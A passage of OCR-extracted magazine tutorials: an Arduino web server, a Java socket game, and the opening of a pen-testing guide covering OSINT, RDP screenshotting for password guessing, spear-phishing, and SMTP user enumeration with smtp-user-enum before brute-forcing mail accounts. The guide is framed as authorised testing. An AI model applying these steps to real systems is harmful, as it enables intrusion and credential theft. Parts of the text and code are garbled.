with ‘type/html’, even if the Arduino is actually sending
over JPEGs or plain text. Also, if any images are large,
you’ll already be experiencing performance issues and, if
too large, you can be denied service altogether.
To fix these problems, you’ll need to create a function
which determines if the file is on the SD card and, if so,
look at the extension and return a string for the response
code and the resource type. This should be used in the
HEAD method when called. You should also return a 404
error if there is no file, and a 405 error if the method isn’t
served by the Arduino. Images should be compressed and
data sent in batches using a buffer.
Prune your program
If you’ve fixed the above problems then pat
yourself on the back: you’ve managed to create a mini-
Serving POST requests
POST requests tell the server that a new
resource needs to be created. On an HTML page these
requests can be generated using the form and input tags.
These allow you to specify the method (e.g. POST) as well
as the action (designating the page to be loaded after
submission). When a user submits, the HTTP request
sends the method, the resource to load and, at the very
end after two line breaks, the message submitted. This
message is in the format ‘field=message data’.
To serve POST requests, you will want to identify the
requested method and call a new function. This function
should read the name of the resource specified by the
action in the form and save it to a spare buffer. It should
then open a file on the SD card, read from client and
save everything after the double-line break. The function
should finish by calling the GET function (which also
calls HEAD) and retrieving the stored resource name. You
may need to modify the existing code and will want the
filename to increment. If you still have program space,
you may also want to split the field name from the data in
the message body by checking for an = sign and use the
field name as the filename for the new resource created.
Load submitted posts
To finish the blog or comments section, you’re
going to want to load all of the information submitted
to the server and display it on the webpage. One might
instinctively think of storing the information in a database
and accessing entries as needed. The only problem is,
we can’t install software or try PHP and MySQL. Instead,
if you’ve got an Arduino with larger program storage,
you might want to make a custom method which acts
like a database query. If you’ve got an ‘ordinary’ Arduino,
everything’s going to have to be done on the client’s side.
One of your author’s many shortcomings is not learning
JavaScript, but now is exactly the time. In the example
website is a snippet of code within an HTML script-tag
which iterates between 0 and 4 and creates a series
of object-tags. These object tags point to text files
containing submitted posts. These are inserted into a
paragraph in the HTML body. When the page is loaded,
the browser requests five objects separately to the .htm
file. It’s a cheap trick, and causes other layout problems,
but the server can cope and the page loads. It would be
better to load the content and layout appropriately – it
might even be better to have most recent first. If you
know how, do it.
Share with the world
The web server is finished. You can send and
receive webpages, text, images, GIFs even. It should even
run reasonably quickly. With a static IP or DynamicDNS,
you could buy a domain and let people connect to your
website without handing out a series of numbers.
However, there is still the issue of sending and
receiving obscenely large images. This will always be slow
– and is even the case with some popular websites. For
now, we can ensure that we only host small images, but if
we really need to we could always link to the resource on
a faster cloud storage service instead.
Sadly, there’s no way of stopping someone attacking
our server by uploading a 32GB file – that’s just not been
programmed in. If there’s room for it in the program, you
could count the number of characters received and check
it doesn’t exceed a limit. If that limit is exceeded, stop
saving and return a bad request code. If there’s no space,
you could do a client-side check in JavaScript.
But there are a hundred-and-one ways someone could
deny all service to the Arduino server. We’ve also added
no security for data stored on the device. However, at
least there’s no way of someone deleting information or
using the Arduino to connect to other local devices.
Help is
at hand
There is a lot of
coding in this tutorial
and not many
examples – there’s
just too much to
print. On the cover
disc is a series of
website files, as well
as the sketch used to
test the server. This
should help explain
how to perform the
tasks described
in the Arduino
language. However,
we recommend
that you write your
own sketch.
Add hardware methods
That was Arduino truly out of its comfort zone!
Now the web server is complete, let’s bring the device
back to what it’s good at: interfacing with hardware. We
can use the web server to act as the infrastructure for
controlling the Arduino remotely. To do this you’ll need
to create a new request comparison condition within
the loop function, as with the other HTTP requests.
To control the device, you can just send this arbitrary
keyword and any further instructions over Telnet (or
equivalent) to the server address to trigger an action
for the Arduino to perform. You could even create a very
simple smartphone app that sends a preset command at
the touch of a button.
And what to do with it? At this point the task could
be anything at all, from turning on a light to watering
some flowers. Depending on the size of the web server
program, it might be useful to use this Arduino as a base
station which then relays the command via radio to
other Arduinos scattered around the house. The bigger
the project, the more likely you are going to need to
upgrade to the larger Arduino. Alternatively, you could
piggyback off of the POST method and put the world in
charge of your hardware using a simple HTML form as
a controller.
Learn Java: Broadcasting your
Java game over a network
is a university tutor
in Programming
and Computer
Science, with a
strong focus on
Java. He likes to
install Linux on
every device he can
get his hands on.
Java has a fully featured networking library that allows
programs to communicate across different computers
OpenJDK 1.8 JDK
JavaFX 8
Eclipse IDE
Telnet client
Tutorial files
When we think of computer networks, we think of the
world wide web, which we can use for sending emails,
watching videos or talking to people over video. In
fact, all of these are examples of a very simple concept:
computers connecting to other computers on a device
called a ‘socket’ and using the socket to send text back
and forth. The text might be in HTML format, it might be
the text representation of an image, and it might even be
encrypted, but the same mechanism is used in all cases.
The Java language has a rich networking library that
allows us to harness this power for our own programs.
At the end of last month’s tutorial, we had a simple
adventure game to play on a single computer. Here
we’ll be making this into a networked game, where the
underlying logic and game model sit on one computer,
and the graphical client used to play the game can be put
on another. We’ll be able to build on this in future tutorials
to make a multiplayer online version of our game.
Getting started
We shall not require any special new software for this
tutorial, but if you are joining us this month then you
should make sure to install OpenJFX on your system.
Look for a package called openjfx. Once you have
installed it, make sure to restart Eclipse if it is already
open. If you have completed the tutorial from last month,
open the project in Eclipse. Otherwise, open up the
implementation of last month’s tutorial that is supplied
on the cover disc. To do this, open up Eclipse, and select
File > Import… from the menu at the top. From the dialog
that comes up, we select General > Existing Projects into
Workspace, and then click ‘Select archive file’, followed
by ‘Browse…’ and navigate to the file eggs.tar on the
LU&D disc. Last, we press ‘Finish’ to import the project.
We have not supplied any additional code for this issue:
you will be extending last month’s code directly.
Networking concepts
The plan for this month’s tutorial is shown in the diagram
at the top of this page. We will be splitting the program
we have into two separate programs: a ‘client’ and a
‘server’. These will communicate with each other through
a device called a ‘socket’, which is a channel that allows
text to flow through a network from program to program.
Thanks to the way we have set up our program, we should
be able to do this without disrupting our existing code too
much: instead of communicating with the game model
directly, our GUI will now communicate with the socket at
its end, while the game model will use the socket for its
input and output.
A computer on a network is identified by a number
called its IP address: for example, The
computer also has 65,536 ‘ports’, also identified by
numbers, which can be used to broadcast and receive
information. We often refer to a port on a particular
machine by separating the IP address and port number
with a colon: for example,
If a program is broadcasting to a particular port on a
machine, we refer to it as a ‘server’. To give the server
work to do, we need a second program, called a ‘client’,
which will communicate with the server. The client can
run either on the same computer as the server or on a
different computer. As long as the client knows the IP
address and port that the server is serving to, it can try
to form a connection known as a ‘socket’. If the server
accepts the connection, then the socket is brought into
existence and client and server can exchange textual
information. There can be more than one socket set up on
the same port, perhaps involving multiple clients.
This is the general principle underpinning much of
computer networking. When we open a website in our
browser, we are in fact setting up a socket with the port
on which the website is being served. The web server
When we open up a
website in our browser,
we are using the ports and
sockets in the same way
as in this project
is set up to broadcast information in the text formats
HTML, CSS and JavaScript, and our web browser is set up
to interpret these text formats as a webpage.
Java has a big networking library – in the
package – that makes it easy to do all this in our
programs. In our server program, if we want to set up a
server on port 9009, we can do so using the code:
ServerSocket serverSocket = new
Meanwhile, the client program needs a way to connect to
the port. It does so by creating a server object:
Socket serverConnection = new
Socket("", 9009);
Left Eclipse makes
it easy to import
a project from an
archive file
The call ServerSocket.accept() blocks (waits) until
some other program attempts to connect to the port at
9009. When it does so, the socket is created and both
client and server can use it to send text back and forth.
Note that if a client tries to create a new socket
and there is no server program broadcasting on that
particular port at that particular IP address, then Java
will throw an exception. Our code will need to handle this
exception appropriately.
The last thing we need to learn how to do is how to
actually send text across a socket. We do this using
‘streams’. If you have written Java code to read and
write text to and from the console using and
System.out, you already know how to use streams. Using
a socket for input and output is the same as using the
console, except we replace System.out with the socket’s
‘output stream’ and replace with the socket’s
‘input stream’. Meanwhile, to read text in from a socket,
we can use a BufferedReader, just as we did in the textonly game. See Figure 1 (overleaf) for an example.
The call BufferedReader.readLine() throws an
IOException, so we’ll need to write code to handle that.
Left Once we are
running our server in
Eclipse, we can use a
Telnet client to check
that it works
Note that is just an example; we will
need to use something else. The server can accept new
connections using the code:
Socket clientConnection = serverSocket.
Figure 1
OutputStream out = new PrintWriter(socket.
out.print("Hello, ");
InputStream in = socket.getInputStream();
BufferedReader reader = new BufferedReader(new
Above Input and
output streams for
sockets provide
the same methods
we’re used to from and
Set up the server
We’ll start by creating the server program. First of all, we
create a new package called
Our server design should follow the pattern given in
the diagram on page 46. That is to say, it should behave
exactly like the existing standalone program, but it
should replace the input and output components with
server-specific components.
First, create a new class called ServerHead. This
class should implement the OutputViewer interface, so
that we can plug it straight into the existing GameModel
class. Create a private field called serverOut of
type PrintWriter in this class. This field will be the
PrintWriter instance that we can use to print text to
the socket. You could set the value of this field in the
constructor. For example:
public ServerHead(Socket clientSocket) throws
serverOut = new PrintWriter(clientSocket.
Changing the old code
Across The humanreadable output for the
inventory command is
not suitable for sending
across a socket. A
compact code is better
Throughout this tutorial, you shouldn’t be afraid to go into the
old classes and modify or repurpose them to suit your new
program, as long as you patch things up so the old programs
still work. For example, if you play through the game in the
attached code, you’ll see that the positions of animals in the
inventory change around as we play through. This is because
the program uses the Set data type to store the animals
in, and Sets are unordered by definition, so Java makes no
guarantee that the animals will stay in the same order.
To fix this, go into the Player interface and modify the
getCarriedEggs() and getCarriedAnimals() methods.
We could replace Set with List, but it’s better to be more
general and use Collection. That way, the implementation
can use Set, List, Queue or anything else to implement the
interface. Right-click on the getCarriedAnimals() method,
go to ‘Refactor’ and select ‘Change method signature’,
replacing Set with Collection. You’ll still need to go into
the HumanPlayer implementation to modify the signatures
of the implementing methods and to change the types of the
field carriedAnimals to Collection.
You can then choose the particular type of collection you
want inside the constructor to HumanPlayer. If you change
HashSet into ArrayList, then the animals will stay in order.
This way, we can create a new instance of the ServerHead
class and pass it a socket to print to in one command.
As an alternative, we could make the ServerHead class
extend the PrintWriter class. Then we can do away with
the field and change the constructor to:
public ServerHead(Socket clientSocket) throws
It is tempting at this point to repurpose the original
ConsoleOutputViewer class, making a few modifications
so that it can print to an arbitrary PrintWriter instance.
You can try this if you like, but there’s a good reason not
to: the output generated by the ConsoleOutputViewer
is not necessarily very easy for the GUI to interpret.
If you are using the supplied code from the first
tutorial, for example, then the ConsoleOutputViewer.
displayInventory() method displays the player’s
inventory in the long form shown in Figure 2. While it may
be possible for the client code to parse this and convert
it into a format the GUI can use to populate its inventory
pane, it is better to print the inventory to the server in a
more compact form, as shown at the bottom of Figure 2.
Similarly, the output from the search command in
ConsoleOutputViewer displays the player symbol in
the middle of the map. But the client does not need this
information; it would be more useful for it to know the tile
that the player is standing on.
In order to implement all the OutputViewer methods
in the ServerHead class, we’ll need to invent some kind
of protocol language that the server can use to convey
the required information about the map, inventory or
messages to the client program. We’ll leave this up to
you: if you’re unsure then you can use the form that we’ve
described above for the displayInventory command
and the usual display for the search command, but
without putting the player symbol in the middle.
There are a couple more things that we should add
to the ServerHead class before we move on. First, the
client needs to have some way of knowing what kind of
command is coming in – whether it’s a message, a map
grid or an inventory code. For that reason, it’s a good idea
to print one of message, map or inventory to the socket
first, before printing the appropriate code.
Figure 2
Carrying 1 mystery eggs.
Carrying 3 animal(s).
Chicken says Cluck
Chicken says Cluck
Duck says Quack
Figure 3
reader = new BufferedReader(new
Changing the constructor of the class will break the
luad.eggs.App class (i.e., the main class for the text
version of the game), so we’d better fix it. Change the line:
ConsoleInputController controller = new
Above When we send the map tiles across the socket, it is better
not to put the player symbol in the middle
Second, the BufferedReader.readLine() method
reads input from the socket a line at a time. So if we
print a map grid to the socket, as in Figure 3, then the
client will read this as eight separate lines of input.
We need some way to tell the client when the message
has finished, so it’s a good idea to send end to the socket
after printing the message. Last, we need to ‘flush’ the
PrintWriter. Socket streams, unlike System.out, buffer
their input for performance reasons, because it is faster
to send a large chunk of text across a socket than to send
many individual lines. Calling the PrintWriter.lush()
method makes sure that the buffer is cleared and our
entire message is sent across to the client.
Polymorphism has
allowed us to switch out
different implementations
of the same functionality in
and out for one another
We could bundle this up into a helper method, e.g.:
private void endMessage()
The next thing to do is to set up the server so it can
read input from the socket. This time, since player
commands are always single lines of text, it makes
sense to repurpose the ConsoleInputController class
in the luad.eggs package so that it can read input from
streams other than Rename the class to
StreamInputController and add a field called reader
of type BufferedReader (if you are using the supplied
code then this field already exists). Add code to the
constructor to set the value of this field:
public StreamInputController(InputStream in)
StreamInputController controller = new
The last step is to create the main class for the server.
Create a class in the called
EggsServer with a main() method in it. We model this
main method on the main method in the luad.eggs.App
class. The only differences are:
• We use a ServerHead instead of a ConsoleOutputViewer.
• We use a StreamInputController initialised with the
input stream of a socket instead of
In order to implement this, we need to add code to set up
the socket. For now, choose a port number (e.g., 9009)
and write code to create a ServerSocket on that port,
as we explained how to do in the previous section. Then,
add a line of code that calls the accept() method on that
ServerSocket instance and returns a Socket instance.
We can now use this instance of Socket to initialise our
ServerHead and StreamInputController objects.
Once we’ve set up the socket, we can pretty much copy
over the code we used in the main method of the luad.
eggs.App class, replacing the ConsoleOutputViewer
with a ServerHead and using the socket to initialise the
StreamInputController. Once again, polymorphism has
allowed us to switch different implementations of the
same functionality in and out for one another.
the server
with Telnet
Once you have
created the server,
you will want to
test it out to check
it works before
you move on to
the client. A great
way to do this
is with a Telnet
client – a very basic
client that sends
whatever you type
to a socket and
prints out whatever
comes back. If your
server is running on
port 9009, you can
use the command
telnet localhost
9009 to start the
Telnet client. Then
try typing some
commands, such
as move E, search
and inventory to
check that your
server is working.
Set up the client
Creating the client will take a bit more work than creating
the server. On the surface, however, we are doing the
same thing: we are connecting our GUI input and output
classes directly to a socket, rather than connecting them
to the game model.
To warm up, create a new package called and add a class to it
called MessagePrinter. This class will replace the
StandardGameModel class in our client. It will be
responsible for listening out for input commands
from the GUI and sending them through to the socket,
and then to the server. This class should have a field
out of type PrintWriter, whose value it sets from
the constructor:
public MessagePrinter(OutputStream
your code
Make sure that
you’re always on
the lookout for
ways in which you
can reuse your old
code. For example,
if you have written
code to read the
game map in from
a file (or if you are
using the supplied
code) then you can
repurpose that code
and use it in the
Translator class.
You might have
to rewrite the
original TextMap
class in order to
abstract out certain
pieces of code as
methods that can be
used elsewhere.
Across The client
doesn’t need to know
what animal the egg
contains in order
to display it, so it is
sufficient to create a
‘dummy’ egg
out = new PrintWriter(outputStream);
Alternatively, the MessagePrinter class could extend the
PrintWriter class and call the superclass constructor in
its constructor.
The MessagePrinter class should also implement the
Observer class, as the StandardGameModel class does.
This means that it needs to implement the update()
method to respond to messages from the object(s) it is
observing. In our case, we will be adding this class as an
observer to the EggsListener class, so it will be receiving
messages of the form search, move N and so on, and it
should pass these messages directly on to the socket
when it receives them. So, for example, the update()
method could contain code that looks like the following:
switch (messages.get(i).charAt(j)) {
case '.':
mapTiles[i][j] = new LandTile();
// ...
case 'E':
mapTiles[i][j] = new LandTile();
SimpleEgg(null, 0));
// ...
…where message is the second parameter to the
update() method.
The next class we shall create will be called
ServerListener. This class should extend the
Observable class. Its role is to listen to the socket for
messages from the server, bundle them up into individual
commands and send them out to the rest of the client
program. Since we want this code to run in its own
thread, ServerListener should also implement the
Runnable interface, as the StreamInputController
class does. The ServerListener class should have
a field socket, of type Socket, which it should set in
the constructor and use to create a BufferedReader
instance called fromServer, from which it can read lines
of text from the server.
The code in this class will go in the run() method,
which is the code that will run when we start the server
listener in its thread. Write this method so that it
contains a loop that repeatedly reads lines of code from
the server:
public void run()
String serverMessage;
while ((serverMessage = fromServer.
readLine) != null) {
// do something
Right The client
is responsible for
converting this grid of
characters into a grid of
tiles on the GUI
Figure 4
This loop should be responsible for bundling up the
server input into Collections (e.g., ArrayLists or
LinkedLists) of strings, and then passing these
collections of strings to the notifyObservers() method
so that the observing classes can deal with them. In other
words, the ServerListener class should repeatedly read
messages from the server, adding them to a collection as
it goes, until it reads an "end" message, at which point it
should call setChanged() and notifyObservers() with
the collection of strings so that some other part of the
program can deal with the messages.
The last component of the client that we need to
write before we put it together is the class that actually
interprets the chunks of strings from the ServerListener
class. Create a class in the
class and call it ServerOutputTranslator. Since this
class is dealing with information from the observable
ServerListener class, it should implement the
Observer interface, and its update() method should be
responsible for dealing with the blocks of strings supplied
by ServerListener.
Add a field to the ServerOutputTranslator class
called viewer of type OutputViewer. As before, write the
constructor so that it takes in an OutputViewer object
as a parameter and uses it to set this field. The update()
method should read its second parameter (which will be
the collection of strings sent by ServerListener), cast
it to a collection of strings and then use these strings to
call methods of the viewer field.
First, we should write a switch statement that looks at
the first string in the collection and determines whether
we are dealing with a single message, an inventory code
or a map grid display. We then need to write code to deal
with the message we ’ve received. There are a few things
to be careful of here. Notice that the displayMapTiles()
method takes in an array of MapGrid objects as a
parameter. Instead, we have an array of characters
like the one in Figure 3, which we need to convert into
MapGrid objects. This is easy enough for land and sea
tiles, as Figure 4 shows. But what if the tile character
Figure 5
public void displayMapTiles(MapTile[][]
Platform.runLater(() -> {
MapView mapArea = gui.getMapArea();
mapArea.displayMapGrid(grid, -3,
that comes through is marked 'E'? That means we should
create a LandTile instance and add an egg to it.
We do not know what animal should go inside the egg.
But this is actually a design feature: if the server sent
information about the contents of the eggs to a port, then
someone could write a malicious client that allowed them
to cheat and look inside the eggs without picking them
up. For the purposes of this client, it is better to create a
‘dummy’ egg with nothing inside it, as in Figure 4.
Similarly, since OutputViewer.displayInventory()
takes a Player object as a parameter, we will need to
create a ‘dummy’ player from the inventory code that the
server supplies us with.
Putting the client together
The final step is to create a class, EggsClient, that acts
as an entry point to the client program. Since the client
involves JavaFX code, this should be based upon the
luad.eggs.gui.App class. The changes we need to make
are similar to the changes we had to make to the server.
First, we create a socket using the code:
Socket socket = new Socket("localhost",
…replacing 9009 with the port number your server is
using. localhost is a special address that refers to your
local machine; to run our client and server on separate
machines, we’d need to find out the server computer’s IP
address and use that in place of localhost.
Across The method
Object streams
Using the ObjectInputStream and ObjectOutputStream
classes, we can send objects across a socket, rather than
text. You can set up an object stream over a socket easily:
ObjectInput in = new ObjectInputStream(socket.
ObjectOutput out = new
makes sure that our
JavaFX code is run
on the FX application
thread. Note our use
of Java 8 lambda
expressions to make
the code more compact
We can write objects to the stream with the writeObject()
and lush() methods and read with readObject(). These
classes work by converting the object into text using a
process called ‘serialization’ and then converting from text
back to objects at the other end. If you use these classes for
this project, it will prevent you from having to write separate
methods to translate from map tiles / inventories to text
and back again. There are a few downsides, however. First,
Java serialization is not understood by other programming
languages, so your server will only work with a client written
in Java, or in another language with a special Java serializing
parser attached. Second, if your server broadcasts the full
objects across the stream, then it’s including information
which the client shouldn’t necessarily have access to. For
example, if the server sends across the full grid of MapTile
objects, it is including info about the animals inside each egg
on the map. A malicious client could then use this information
to cheat by looking inside the eggs without picking them up.
Use this socket to create instances of the
MessagePrinter and ServerListener classes. Create
the GUI as before and use it to create GuiOutputViewer
and EggsListener objects. You can use the
GuiOutputViewer object to set up an instance of
Now we need to add observers to the right objects.
The ServerOutputTranslator object should be listening
to the ServerListener class, as we discussed, and the
MessagePrinter object should be added as an observer
to the EggsListener object. The last step is to start the
ServerListener thread:
new Thread(serverListener).start();
Now it’s time to test our program. First run the server
class EggsServer from Eclipse, then run the EggsClient
class. If everything works as it did at the start, then you
have done a very good job. More likely, you will need to
spend some time debugging your code to get it right.
Thread warning
If you follow these steps, you might end up with an error
that looks like this:
java.lang.IllegalStateException: Not on FX
application thread
Above In order to try out the program, run the server first, and
then run the client. You can do both in one Eclipse session
This is because JavaFX code all needs to run on a special
thread called the FX application thread. To fix this, go into
the luad.eggs.gui.GuiOutputViewer class and wrap the
interface methods in there inside Platform.runLater()
calls, as in Figure 5.
Top pen-testing techniques
01001000 01100101 01101100 01101100 01101111 00100000 01010111
01101111 01110010 01101100 01100100 01001000 01100101 01101100
01101100 IDENTITY THEFT 01010111 01101111 01110010 01101100
01100100 01001000 01100101 01101100 01101100 01101111 01101111
01110010 01101100 01100100 01001000 01100101 01101100 01101100
01101111 00100000 01010111 01101100 01100100 BANK ACCOUNTS
01100101 01101100 01101100 0 01101100 01100100 01001000
01100101 01101100 01101100 01101111 00100000 01010111 01101111
01110010 01101100 01100100 01001000 01100101 01101100 01101100
01101111 WEAK PASSWORD 01110010 01101100 01100100
0100100 01101100 01101111 00100000 01010111 01101111 01110010
01101100 01100100 01001000 01100101 01101100 01101100 01101111
00100000 01010111 01101111 01110010 01101100 01100100 01001000
01100101 01101100 01101100 01101111 00100000 01010111 01101111
011100 01010111 01101111 01001000 01100101 01101100 01101100
Take the
Having nightmares every night about terrible data breaches on your systems?
Fret not: Toni Castillo Girona demonstrates how to identify those weak spots
and regain control of your dreams so you can sleep soundly!
Ethical hacking
This guide is for use on networks
and systems that you own.
You have been warned!
he media is full of news concerning data
breaches exposing countless usernames and
hashed passwords day in and day out. Most of
them are due to weak spots on the compromised
systems, such as well-known vulnerabilities or buggy
in-house developments. To some, black hats are
tech-savvy people performing magic tricks. They are
indeed tech-savvy people, but they do not perform
magic at all. Most data breaches can be explained by
means of well-known vulnerabilities, SQL-injection
issues and old systems that haven't been patched.
To identify these weak spots, professional
penetration testers perform an assortment of tests
whose techniques are not far from the ones used by
black hats. The main difference, of course, is that
they have been hired to find (and sometimes exploit)
these weak spots. Black-box pen-testing is similar to
what an external attacker would try (as the pen-tester
does not know anything about the target prior to the
engagement). A pen-tester works with what is already
known. That means that they do not (usually) look for
zero-days or deal with reverse engineering.
A pen-test is composed of seven different stages.
The pre-engagement stage happens before the test
actually begins; here the pen-tester and the company
11 01101111 01110010 0
00 01101100 01101111 0
11 01101111 01001000 0
00 01100101 01101100
1 01110010 01101100 0
00 01001000 01100101
10 01101100 01100100 0
1 00100000 01010111 0
01 01101100 01101100 0
01 01101100 01101100 0
networks to collect
banners, software
versions and the
like. This is known as
‘fingerprinting’. Next,
the pen-tester will sort
out all the information
obtained in order to
perform threat modelling,
where possible attack
scenarios are considered. In
order to determine which ones
would succeed, the fourth stage deals
with vulnerability assessment, where the pen-tester
actively engages with the company systems and
networks in order to look for well-known vulnerabilities
that could be exploited. For those detected weak spots,
the pen-tester will run exploits against the vulnerable
services and systems during the exploitation stage.
Being able to set a foothold into the system is good, but
the pen-tester must go beyond that by moving laterally
on the network, dealing with evasion techniques,
escalating privileges and being persistent. This is
known as the post-exploitation stage.
Finally, the boring stuff: reporting. This is the last
stage and the one that
summarises all the
findings, vulnerabilities
and actions performed
against the target’s
systems. There are
two types of report: an
executive report and
a technical report. The former is meant for executives
and offers a high-level overview of the findings. The
latter is meant for the security engineers working in the
company and is heavily technical (see an example here:
These stages are not mandatory: some pen-tests
may stop right at the fourth stage because the
company does not want the pen-tester to exploit the
findings. During the exploitation stage, a pen-tester
must be extremely careful: running exploits against
live systems can break them. That is why it’s so
important to have a deep understanding about the
exploits used against a target. So, it does not matter
whether you want to become a professional pen-tester
or you are just interested in learning about it to protect
your own network: this tutorial will provide you with
a bunch of tools and techniques, a real pen-testing
engagement, plus a pen-testing challenge to test your
skills. Happy hacking!
A pen-tester works with what is already
known. So they do not (usually) look for
zero-days or deal with reverse engineering
agree on the scope of the test; at which time of day the
test will be conducted and what to do when a critical
vulnerability is found and so on. This is an important
stage because it defines what you are authorised to do
and provides you with some legal coverage.
Once that is settled, the pen-test begins with the
information gathering stage, where the pen-tester
makes use of open source intelligence techniques
(OSINT) in order to gather as much information about
the company, its systems, networks and employees
as possible (email addresses,
subdomains and so on).
This first step is known
as ‘footprinting’. After
that, the pen-tester
engages with a
bunch of preselected target
systems and
Top pen-testing techniques
Welcome to information gathering the most tedious
(along with reporting) and yet the most important stage
in any pen-testing engagement. During this stage, you will
perform both passive and active discovery. The former
leverages public sources to gather some information
without connecting to the target systems and it is also
known as footprinting, whereas the latter implies some
level of interaction and it is known as fingerprinting. To
most pen-testers (including you), this is what most of
your time should be spent on. Apart from Google Search
or Bing, you can use a bunch of well-known tools to
automate (to a certain degree) the extraction and sorting
out of this information [see Tutorials, p52, LU&D172].
Tools such as Recon-ng (,
Spiderfoot ( and Maltego (http://bit.
ly/Maltego) can prove really useful. These tools leverage
online services such as Censys, Shodan, GitHub, Twitter
and so on (by means of their APIs). So, it’s best to have
valid accounts there.
Above OSINT techniques
allow you to perform
passive discovery
against targets (almost)
without leaving a trace
Information gathering
Right Integrated tools
like Sparta are great for
performing fingerprinting
and vulnerability
assessment in one shot
The first thing to do is to pick your tools (see GNU/Linux
Pen-testing Distros box, p59) and be able to write your
own. Pen-testing engagements are tightly related to
sensitive data. A pen-tester may perform more than one
assessment at any given time, so these assessments
must be isolated from one another. The computer(s) used
during an engagement must be properly protected as
well. All the data must reside on an encrypted partition
(in Kali Linux, this is easily accomplished during the
distro's installation thanks to LUKS and LVM) so that in
case of a stolen computer, unauthorised users will not be
able to access to the information gathered or extracted
during the pen-test.
Arm yourself to the teeth!
Max intel
Make sure to
gather as much
about your target
as possible
during the
gathering stage,
then take as
much time as
needed sorting it
all out.
A pen-tester using a VPN to perform the assessment
must make sure that uncontrolled packets are not going
out of their host network interface to avoid being noisy
on the audited network. If you are a bit paranoid, then set
up proper rules to allow output packets to reach target
hosts and services as you need them. Configuring some
rules for the IPTABLES OUTPUT chain is as important
as being able to set up proper rules for both the INPUT
and FORWARD chains too (see How To Self-Secure Your
Pen-testing Computer box p55). This is equally important
for servers; sadly, most system managers tend to forget
about to do this.
We are about to have some fun now. Before going
further, though, you will need to install Kali Linux on a
virtual machine on your computer. If you have already
picked another pen-testing GNU/Linux distro, that’s fine:
most of them do include the same tools and frameworks
or can install them on your preferred GNU/Linux distro.
Gathering the information is but the first step: later on,
you will have to sort it out. Among all the gathered data,
some low-hanging fruit may appear: legacy systems
[see Tutorials, p44, LU&D182], maybe an open SMTP
relay, some old CMS version still running on an obscure
directory within the company’s web server [see Tutorials,
p38, LU&D175]… who knows? Trust us: it’s boring stuff,
but it’s totally worth it.
Once you have a good understanding of the servers and
systems running on the target, you can model possible
attack vectors. Imagine that during passive discovery
using Shodan, a list of client desktops with public IP
addresses running RDP have popped out. Unluckily for
you, there are no screenshots this time. It could be a
The information gathering
stage is the most tedious,
boring and yet the most
important one in any pentesting engagement
good idea to perform active discovery next in order to
grab a screenshot for every host and thereby obtaining
some usernames and Window versions along the way.
Go and download EyeWitness: git clone https://, and then
execute it this way: -f hosts.txt --rdp
(where hosts.txt is the file with all the hosts reported by
Shodan, one per line). See? Now you could guess some
of these passwords. Some users may have very weak
ones. You then annotate these as a feasible attack vector
during the exploitation stage. Besides, having some
Window versions will help you perform the vulnerability
assessment stage, too.
So far so good but, what if the information gathering
stage does not reveal low-hanging fruit? Well, that’s why
the pre-engagement stage is key: are you allowed to use
‘social engineering’ attacks? If so, you can perform an
assortment of attacks: spear-phishing, massive malware
sending to the target’s employees, among others. There’s
a well-known tool that integrates most of these attacks
to save you time: SET ( Before
preparing the attack, of course, you will need to gather
a lot of information about a subset of employees. Social
networks like Twitter and Facebook are useful here. Some
incredible tools exist to automate this extraction, such as
Tinfoleaks. Navigate to and click
on ‘Search for leaks’. Type the Twitter account you want
to get information from in the ‘@Twitter username’ box
and a valid email account in the ‘Email Address’ box and
you will receive a detailed report in your inbox. If you don’t
want to use your own email address, you can generate a
disposable address by visiting
If you are even more paranoid, use the Tor network to
hide your IP from Tinfoleaks. Leaks such as geolocation
information, tools used by the user, and so on will be
presented to you. You can also use Tinfoleaks from the
CLI if you prefer so ( – zip file).
Do you need more? Probably: use Maltego CE to gather a
comprehensive list of email addresses, accounts, webs
where the user has posted information, possible GPG
keys, and much more; everything rendered as nodes in a
fancy graph!
The information gathering stage is not limited to
computers or network equipment such as routers,
switches or even access points. Employees from around
the globe are nowadays bringing their devices (tablets,
smartphones and the like) to the office. This, of course,
increases the attack surface. During a pen-test, if you
happen to find smartphones connected to the network,
then the chances are that these devices are poorly
protected, so you should consider them as easy targets.
Do your
because you
have found
nothing? Oh well,
time to prepare
some social
attacks then!
Before that,
make sure to
get as much
information as
possible about
Self-secure your pen-testing computer
Encrypt your data
During the installation of Kali Linux (and other pentesting distros), you will be given the choice of setting up LVM
and LUKS to encrypt your partitions. Don’t hesitate to do it, and
do not forget to encrypt the swap partition also. In case your
computer is stolen, this will prevent unauthorised users from
accessing to any sensible data extracted during a pen-test.
Stay away from PoCs
Whenever feasible, avoid downloading and executing
PoC (Proof of Concept) code against real targets because it
tends to be unstable and poorly written. Besides, it may harm
your computer as well. If you happen to find a service that may
be vulnerable to a well-known issue, stay within bullet-proof
frameworks such as Metasploit to execute exploits securely.
Put a leash on your output packets!
Verify and validate everything
Use iptables to set up proper rules for the OUTPUT
chain in order to prevent undesirable output packets going out
your network interface: first, drop everything: iptables -P
OUTPUT DROP. Next, add the rules you need to the chain along
the way; for example, DNS resolution: iptables -A OUTPUT -o
eth0 -p udp -d SERVER -dport 53 -j ACCEPT.
Whenever setting up your pen-testing equipment,
make sure to validate any single downloaded ISO image, DEB
package, or even APT remote repositories to avoid ending up
installing a tampered piece of software! Besides, if you are
using Kali you will be logged as ‘root’, so be extremely cautious
before executing unknown code or tools.
Begin with
the basics
During the
stage, start with
the basics first:
legacy systems,
old software
versions, open
services that
allow userenumeration,
poorly default
and insecure
fruit, and so on.
Top pen-testing techniques
As a rule of thumb, spend as much time as possible
performing passive discovery; you'll be surprised as to
how much company information is leaked on the internet.
Vulnerability assessment
Well, here you are: you have finished modelling threats
and now you are ready to start the vulnerability
assessment stage. Let’s imagine that you have found an
SMTP server within the target’s network, so a reasonable
attack vector could be to test whether this SMTP server is
an open relay or allows you to perform user-enumeration
by means of the RCPT TO or VRFY commands. In case
it does, you could proceed to enumerate valid email
accounts (and thus revealing additional email addresses
to the ones obtained during the footprinting step, for
example, by running TheHarvester). Then, you could
prepare a brute-force password attack in order to get
illegal access to some email addresses (often, the email
portion before the domain address is also the username).
Of course, if you do get access to one of such emails,
the chances are that you will be able to access to other
services as that user, because most companies provide
their users with some sort of single sign-on (CAS)
server. Kali ships with a bunch of tools for SMTP userenumeration; let’s try smtp-user-enum first:
# smtp-user-enum -M VRFY -U users.txt -t
SERVER: www exists
Kali includes another tool, ismtp. Let’s try it: ismtp
-h SERVER -e users.txt -l 1. Suppose this time,
however, you get an error, e.g. ‘Error 2.0.0. www’, and
the tool stops. Why? Some tools will work out-of-thebox whereas others won’t; this is fairly common when it
